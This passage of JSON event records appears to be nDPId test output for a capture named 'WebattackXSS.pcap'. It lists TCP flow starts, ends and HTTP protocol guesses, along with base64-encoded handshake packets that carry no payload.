-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347202722,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347202722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83mxAAD4G52OsEAABwKgKMtWgAFD5fxMfAAAAAKACchCtxwAAAgQFtAQCCAoBOc1zAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1aA8zHVU+X8TIKAScSBZuAAAAgQFtAQCCAoD457qATnNcwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03m1AAD4G52qsEAABwKgKMtWgAFD5fxMgPMx1VYAQAOX4vwAAAQEICgE5zXMD457q"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347205214,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347205214,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZeBAAD4GX\/CsEAABwKgKMtW6AFAegaoCAAAAAKACchDvWQAAAgQFtAQCCAoBOc\/iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1bp74sNGHoGqA6AScSAL0wAAAgQFtAQCCAoD46FZATnP4gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1499347205215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347205215,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZeFAAD4GX\/esEAABwKgKMtW6AFAegaoDe+LDR4AQAOWq2QAAAQEICgE5z+MD46FZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347206497,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347206497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85d9AAD4G3\/CsEAABwKgKMtXIAFBJFTT8AAAAAKACchA4fQAAAgQFtAQCCAoBOdEjAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1cindk\/NSRU0\/aAScSCbmwAAAgQFtAQCCAoD46KZATnRIwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1499347206498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347206498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05eBAAD4G3\/esEAABwKgKMtXIAFBJFTT9p3ZPzoAQAOU6owAAAQEICgE50SMD46KZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347207764,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347207764,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oEFAAD4GJY+sEAABwKgKMtXWAFBZgnIhAAAAAKACchDpnwAAAgQFtAQCCAoBOdJgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1dboCFwKWYJyIqAScSD+sQAAAgQFtAQCCAoD46PWATnSYAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2008,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1499347207765,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347207765,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oEJAAD4GJZasEAABwKgKMtXWAFBZgnIi6AhcC4AQAOWduQAAAQEICgE50mAD46PW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347210270,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347210270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H3tAAD4GplWsEAABwKgKMtXwAFCR7supAAAAAKACchBVHwAAAgQFtAQCCAoBOdTSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1fCjgnLike7LqqAScSCVbAAAAgQFtAQCCAoD46ZJATnU0gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2026,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H3xAAD4GplysEAABwKgKMtXwAFCR7suqo4Jy44AQAOU0dAAAAQEICgE51NID46ZJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347211522,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211522,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86VZAAD4G3HmsEAABwKgKMtX+AFCmKj9dAAAAAKACchDL6AAAAgQFtAQCCAoBOdYLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1f624YVgpio\/XqAScSDlHwAAAgQFtAQCCAoD46eCATnWCwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1499347211523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347211523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06VdAAD4G3ICsEAABwKgKMtX+AFCmKj9etuGFYYAQAOWEJgAAAQEICgE51gwD46eC"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347214088,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347214088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KIZAAD4GnUqsEAABwKgKMtYYAFAozfALAAAAAKACchCV+wAAAgQFtAQCCAoBOdiNAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1499347214089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1hgNeWHdKM3wDKAScSB5nQAAAgQFtAQCCAoD46oDATnYjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1499347214089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347214089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KIdAAD4GnVGsEAABwKgKMtYYAFAozfAMDXlh3oAQAOUYpQAAAQEICgE52I0D46oD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347215361,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347215361,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dFpAAD4GUXasEAABwKgKMtYmAFDVm62RAAAAAKACchAqWwAAAgQFtAQCCAoBOdnLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1iYsMlMv1ZutkqAScSD8swAAAgQFtAQCCAoD46tBATnZywEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2068,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1499347215362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347215362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dFtAAD4GUX2sEAABwKgKMtYmAFDVm62SLDJTMIAQAOWbuwAAAQEICgE52csD46tB"} 